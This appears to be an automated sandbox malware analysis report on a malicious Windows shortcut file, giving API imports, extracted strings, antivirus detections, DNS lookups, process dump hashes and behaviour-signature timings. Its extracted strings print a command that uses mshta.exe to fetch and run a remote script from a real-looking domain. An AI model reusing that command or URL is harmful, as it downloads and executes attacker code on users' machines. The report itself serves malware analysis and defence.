urlmon.dll.CoInternetCreateSecurityManager
oleaut32.dll.#8
urlmon.dll.CoInternetCreateZoneManager
ole32.dll.CoInitializeEx
ole32.dll.CoUninitialize
ole32.dll.CoRegisterInitializeSpy
ws2_32.dll.GetAddrInfoExW
oleacc.dll.LresultFromObject
user32.dll.GetGUIThreadInfo
user32.dll.GetCursorInfo
user32.dll.GetWindowInfo
user32.dll.GetTitleBarInfo
user32.dll.GetScrollBarInfo
user32.dll.GetComboBoxInfo
user32.dll.GetAncestor
user32.dll.RealChildWindowFromPoint
user32.dll.RealGetWindowClassW
user32.dll.GetAltTabInfoW
user32.dll.GetListBoxInfo
user32.dll.GetMenuBarInfo
user32.dll.SendInput
user32.dll.BlockInput
user32.dll.LogicalToPhysicalPoint
user32.dll.PhysicalToLogicalPoint
user32.dll.WindowFromPhysicalPoint
user32.dll.GetPhysicalCursorPos
kernel32.dll.GetModuleFileNameW
kernel32.dll.VirtualAllocEx
kernel32.dll.VirtualFreeEx
ntdll.dll.NtQueryInformationProcess
ntdll.dll.NtAllocateVirtualMemory
ntdll.dll.NtFreeVirtualMemory
oleaut32.dll.DllGetClassObject
oleaut32.dll.DllCanUnloadNow
sxs.dll.SxsOleAut32MapIIDToProxyStubCLSID
advapi32.dll.RegQueryValueW
oleacc.dll.ObjectFromLresult
advapi32.dll.RegOpenKeyW
ole32.dll.RegisterDragDrop
iphlpapi.dll.ConvertInterfaceGuidToLuid
iphlpapi.dll.GetIpForwardTable2
iphlpapi.dll.GetIpNetEntry2
iphlpapi.dll.FreeMibTable
api-ms-win-downlevel-ole32-l1-1-0.dll.StringFromIID
api-ms-win-downlevel-ole32-l1-1-0.dll.CoUninitialize
api-ms-win-downlevel-ole32-l1-1-0.dll.CoSetProxyBlanket
ole32.dll.ObjectStublessClient10
oleaut32.dll.#2
ole32.dll.CoTaskMemFree
api-ms-win-downlevel-advapi32-l1-1-0.dll.RegEnumKeyExW
urlmon.dll.#407
urlmon.dll.#446
api-ms-win-downlevel-ole32-l1-1-0.dll.CoWaitForMultipleHandles
msls31.dll.#62
msls31.dll.#63
msls31.dll.#66
msls31.dll.#61
msls31.dll.#71
msls31.dll.#1
msls31.dll.#49
msls31.dll.#52
msls31.dll.#48
msls31.dll.#3
d2d1.dll.#1
dwrite.dll.DWriteCreateFactory
dxgi.dll.CreateDXGIFactory1
gdi32.dll.D3DKMTOpenAdapterFromGdiDisplayName
gdi32.dll.D3DKMTCloseAdapter
gdi32.dll.D3DKMTQueryAdapterInfo
gdi32.dll.D3DKMTOpenAdapterFromDeviceName
setupapi.dll.SetupDiGetClassDevsW
setupapi.dll.SetupDiEnumDeviceInterfaces
setupapi.dll.SetupDiGetDeviceInterfaceDetailW
setupapi.dll.SetupDiDestroyDeviceInfoList
setupapi.dll.SetupDiGetDevicePropertyW
wintrust.dll.WinVerifyTrust
d3d11.dll.D3D11CreateDevice
dxgi.dll.CompatValue
d3d10warp.dll.D3DKMTOpenAdapterFromGdiDisplayName
d3d10warp.dll.D3DKMTOpenAdapterFromDeviceName
d3d10warp.dll.D3DKMTGetDisplayModeList
d3d10warp.dll.D3DKMTSetVidPnSourceOwner
d3d10warp.dll.D3DKMTSetDisplayMode
d3d10warp.dll.D3DKMTCloseAdapter
d3d10warp.dll.D3DKMTSetGammaRamp
d3d10warp.dll.D3DKMTGetDeviceState
d3d10warp.dll.D3DKMTQueryAdapterInfo
d3d10warp.dll.D3DKMTWaitForVerticalBlankEvent
gdi32.dll.D3DKMTCreateDCFromMemory
gdi32.dll.D3DKMTDestroyDCFromMemory
gdi32.dll.D3DKMTCheckVidPnExclusiveOwnership
gdi32.dll.D3DKMTCheckMonitorPowerState
gdi32.dll.D3DKMTCheckSharedResourceAccess
d3d10warp.dll.D3DKMTGetMultisampleMethodList
d3d10warp.dll.D3DKMTSetDisplayPrivateDriverFormat
d3d10warp.dll.D3DKMTDestroySynchronizationObject
d3d10warp.dll.D3DKMTCreateSynchronizationObject
d3d10warp.dll.D3DKMTDestroyContext
d3d10warp.dll.D3DKMTCreateContext
d3d10warp.dll.D3DKMTGetContextSchedulingPriority
d3d10warp.dll.D3DKMTSetContextSchedulingPriority
d3d10warp.dll.D3DKMTPresent
d3d10warp.dll.D3DKMTDestroyDevice
d3d10warp.dll.D3DKMTCreateDevice
d3d10warp.dll.D3DKMTQueryAllocationResidency
d3d10warp.dll.D3DKMTSetAllocationPriority
d3d10warp.dll.D3DKMTDestroyAllocation
d3d10warp.dll.D3DKMTOpenResource
d3d10warp.dll.D3DKMTQueryResourceInfo
d3d10warp.dll.D3DKMTCreateAllocation
d3d10warp.dll.D3DKMTSignalSynchronizationObject
d3d10warp.dll.D3DKMTWaitForSynchronizationObject
d3d10warp.dll.D3DKMTEscape
d3d10warp.dll.D3DKMTUnlock
d3d10warp.dll.D3DKMTLock
d3d10warp.dll.D3DKMTRender
d3d10warp.dll.OpenAdapter10_2
d3d10warp.dll.#199
urlmon.dll.#421
urlmon.dll.#408
msls31.dll.#44
msls31.dll.#5
urlmon.dll.#513
user32.dll.IsWindowRedirectedForPrint
d2d1.dll.#5
oleaut32.dll.#10
"C:\Windows\System32\msHta.Exe" http://www.nrots.net/images/5328C28B/15936/11348/7c8d64e9/e17e25e
C:\Users\Rebecca\AppData\Local\Temp\file.lnk
Local\ZonesCacheCounterMutex
Local\ZonesLockedCacheCounterMutex
CicLoadWinStaWinSta0
Local\MSCTF.CtfMonitorInstMutexDefault1
!IECompat!Mutex

Flags

Icon ..\..\..\Windows\System32\cftmo.exe
CMD line http://www.nrots.net/images/5328C28B/15936/11348/7c8d64e9/e17e25e
Icon %SystemRoot%\system32\SHELL32.dll

Windows
System32
cftmo.exe
C:\Windows\System32\cftmo.exe
%windir%\system32\cftmo.exe
1SPS0
user-pc
Windows
System32
msHta.Exe
#..\..\..\Windows\System32\cftmo.exe
%windir%Ahttp://www.nrots.net/images/5328C28B/15936/11348/7c8d64e9/e17e25e!%SystemRoot%\system32\SHELL32.dll
%windir%\system32\cftmo.exe
cftmo.exe
Application
S-1-5-21-2108907110-3666731302-1928028421-1000
System32 (C:\Windows)
C:\Windows\System32\cftmo.exe

Full Results

Engine Signature Engine Signature Engine Signature
Bkav Clean MicroWorld-eScan Heur.BZC.YAX.Nioc.1.0443ACBC CMC Clean
CAT-QuickHeal LNK.Downloader.37267 McAfee LNK/Agent-FSDJ!120E3733E167 Malwarebytes Clean
Zillya Trojan.Agent.Script.360339 SUPERAntiSpyware Clean Sangfor Malware
K7AntiVirus Clean K7GW Clean Arcabit Heur.BZC.YAX.Nioc.1.0443ACBC
Baidu Clean F-Prot LNK/Trojan.ICHT-34 Symantec Trojan Horse
ESET-NOD32 Clean TrendMicro-HouseCall TROJ_FRS.VSNTD720 Avast Other:Malware-gen [Trj]
ClamAV Clean Kaspersky HEUR:Trojan.WinLNK.Agent.gen BitDefender Heur.BZC.YAX.Nioc.1.0443ACBC
NANO-Antivirus Clean ViRobot Clean Tencent Win32.Trojan.Agent.Auto
Ad-Aware Heur.BZC.YAX.Nioc.1.0443ACBC Sophos Troj/DownLnk-X Comodo Clean
F-Secure Clean DrWeb Trojan.DownLoader33.28040 VIPRE Clean
TrendMicro TROJ_FRS.VSNTD720 McAfee-GW-Edition LNK/Agent-FSDJ!120E3733E167 FireEye Heur.BZC.YAX.Nioc.1.0443ACBC
Emsisoft Heur.BZC.YAX.Nioc.1.0443ACBC (B) Ikarus Trojan.Agent Cyren LNK/Trojan.ICHT-34
Jiangmin Clean Avira Clean Antiy-AVL Trojan/Generic.Generic
Kingsoft Clean Microsoft Trojan:Win32/Casdet!rfn AegisLab Trojan.WinLNK.Acbc.4!c
ZoneAlarm HEUR:Trojan.WinLNK.Agent.gen Avast-Mobile Clean GData Heur.BZC.YAX.Nioc.1.0443ACBC
AhnLab-V3 Clean ALYac Trojan.Downloader.LnK.Gen TACHYON Clean
VBA32 Clean Zoner Clean Rising Downloader.Mshta/LNK!1.BADA (CLASSIC)
Yandex Clean SentinelOne Clean MaxSecure Clean
Fortinet Clean BitDefenderTheta Clean AVG Other:Malware-gen [Trj]
Panda Clean Qihoo-360 Generic/Trojan.066
Sorry! No behavior.

Hosts

Direct IP Country Name
Y 8.8.8.8 [VT] United States
Y 1.1.1.1 [VT] Australia

TCP

No TCP connections recorded.

UDP

Source Source Port Destination Destination Port
192.168.1.4 51228 1.1.1.1 53
192.168.1.4 51819 1.1.1.1 53
192.168.1.4 62350 1.1.1.1 53
192.168.1.4 137 192.168.1.255 137
192.168.1.4 51228 8.8.8.8 53
192.168.1.4 51819 8.8.8.8 53
192.168.1.4 62350 8.8.8.8 53

DNS

Name Response Post-Analysis Lookup
www.nrots.net [VT] 185.163.47.134 [VT]

HTTP Requests

No HTTP requests performed.

SMTP traffic

No SMTP traffic performed.

IRC traffic

No IRC requests performed.

ICMP traffic

No ICMP traffic performed.

CIF Results

No CIF Results

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Suricata HTTP

No Suricata HTTP

Sorry! No dropped Suricata Extracted files.

JA3

No JA3 hashes found.

Sorry! No dropped files.
Sorry! No CAPE files.
Process Name cmd.exe
PID 5204
Dump Size 302592 bytes
Module Path C:\Windows\System32\cmd.exe
Type PE image: 32-bit executable
PE timestamp 2010-11-20 09:00:27
MD5 ac44491d412ecd2a77fb9fd5fa299620
SHA1 29dbef220f37fd8afe82de54fbcd99d4df1ddac3
SHA256 b35ac1bcb58e44c2df5162b4c3e2e1d6b14a5dceef6133177a498eb5dafaf891
CRC32 500C1102
Ssdeep 3072:OJutMJ3KZliSK3TswJTJZTbsyxKNT4jwpt0qMYk2jyGez1c:O4tg3p3PVPHPxi4m0qMYk2mt+
Dump Filename b35ac1bcb58e44c2df5162b4c3e2e1d6b14a5dceef6133177a498eb5dafaf891
Download Download Zip

BinGraph Download graph

Process Name mshta.exe
PID 5952
Dump Size 13312 bytes
Module Path C:\Windows\System32\mshta.exe
Type PE image: 32-bit executable
PE timestamp 2013-10-14 05:50:08
MD5 eda52e9186cbe58e639ddfa26b67089b
SHA1 d477f56351a42bf58977c0e73497a958b4f8a1be
SHA256 1abc16ef77d4f5aa0e884c1f29ea0487e035da4d534e516c1b73a4ef0b99db81
CRC32 F2D65049
Ssdeep 192:WVHLE1moNa2pTL3YiweO+T1MYDJWwelJIRBU:WT92tLI3lsWw6
Dump Filename 1abc16ef77d4f5aa0e884c1f29ea0487e035da4d534e516c1b73a4ef0b99db81
Download Download Zip

BinGraph Download graph

Defense Evasion Execution
  • T1064 - Scripting
    • Signature - script_network_activity
  • T1064 - Scripting
    • Signature - script_network_activity

    Processing ( 7.611 seconds )

    • 5.223 Suricata
    • 1.199 NetworkAnalysis
    • 0.749 BehaviorAnalysis
    • 0.154 VirusTotal
    • 0.118 CAPE
    • 0.106 Deduplicate
    • 0.033 ProcDump
    • 0.019 AnalysisInfo
    • 0.005 Debug
    • 0.003 Dropped
    • 0.002 TargetInfo

    Signatures ( 1.6059999999999974 seconds )

    • 0.493 antiav_detectreg
    • 0.162 infostealer_ftp
    • 0.158 territorial_disputes_sigs
    • 0.105 antianalysis_detectreg
    • 0.091 infostealer_im
    • 0.053 antivm_vbox_keys
    • 0.041 antidbg_windows
    • 0.035 antivm_vmware_keys
    • 0.03 infostealer_mail
    • 0.026 antivm_parallels_keys
    • 0.026 antivm_xen_keys
    • 0.019 api_spamming
    • 0.019 stealth_timeout
    • 0.018 antivm_generic_scsi
    • 0.018 decoy_document
    • 0.017 antivm_generic_diskreg
    • 0.017 antivm_vpc_keys
    • 0.014 NewtWire Behavior
    • 0.014 ransomware_files
    • 0.013 geodo_banking_trojan
    • 0.008 antiav_detectfile
    • 0.008 antivm_xen_keys
    • 0.008 antivm_hyperv_keys
    • 0.008 bypass_firewall
    • 0.008 ransomware_extensions
    • 0.007 antivm_generic_services
    • 0.007 recon_programs
    • 0.006 kibex_behavior
    • 0.006 persistence_autorun
    • 0.006 OrcusRAT Behavior
    • 0.005 Extraction
    • 0.005 betabot_behavior
    • 0.005 blackrat_registry_keys
    • 0.005 antianalysis_detectfile
    • 0.005 antivm_generic_system
    • 0.005 ketrican_regkeys
    • 0.005 darkcomet_regkeys
    • 0.005 infostealer_bitcoin
    • 0.005 masquerade_process_name
    • 0.005 limerat_regkeys
    • 0.005 recon_fingerprint
    • 0.004 antiemu_wine_func
    • 0.004 antivm_generic_disk
    • 0.004 dynamic_function_loading
    • 0.004 antivm_generic_bios
    • 0.003 Doppelganging
    • 0.003 InjectionCreateRemoteThread
    • 0.003 uac_bypass_eventvwr
    • 0.003 exploit_heapspray
    • 0.003 injection_createremotethread
    • 0.003 injection_runpe
    • 0.003 malicious_dynamic_function_loading
    • 0.003 antivm_vbox_files
    • 0.003 browser_security
    • 0.003 disables_browser_warn
    • 0.003 warzonerat_regkeys
    • 0.003 remcos_regkeys
    • 0.002 InjectionProcessHollowing
    • 0.002 antidebug_guardpages
    • 0.002 antivm_vbox_libs
    • 0.002 bootkit
    • 0.002 dridex_behavior
    • 0.002 exec_crash
    • 0.002 infostealer_browser_password
    • 0.002 kovter_behavior
    • 0.002 mimics_filetime
    • 0.002 reads_self
    • 0.002 stealth_file
    • 0.002 virus
    • 0.002 network_torgateway
    • 0.002 medusalocker_regkeys
    • 0.001 InjectionInterProcess
    • 0.001 InjectionSetWindowLong
    • 0.001 antiav_avast_libs
    • 0.001 antisandbox_script_timer
    • 0.001 antivm_vbox_window
    • 0.001 cerber_behavior
    • 0.001 exploit_getbasekerneladdress
    • 0.001 exploit_gethaldispatchtable
    • 0.001 hancitor_behavior
    • 0.001 network_tor
    • 0.001 rat_nanocore
    • 0.001 shifu_behavior
    • 0.001 stack_pivot
    • 0.001 tinba_behavior
    • 0.001 antidbg_devices
    • 0.001 antivm_generic_cpu
    • 0.001 antivm_vmware_files
    • 0.001 bot_drive
    • 0.001 browser_addon
    • 0.001 modify_proxy
    • 0.001 disables_system_restore
    • 0.001 predatorthethief_files
    • 0.001 qulab_files
    • 0.001 modify_security_center_warnings
    • 0.001 modify_uac_prompt
    • 0.001 network_dns_opennic
    • 0.001 packer_armadillo_regkey
    • 0.001 nemty_regkeys
    • 0.001 revil_mutexes
    • 0.001 stealth_hiddenreg

    Reporting ( 3.135 seconds )

    • 3.096 BinGraph
    • 0.038 MITRE_TTPS
    • 0.001 PCAP2CERT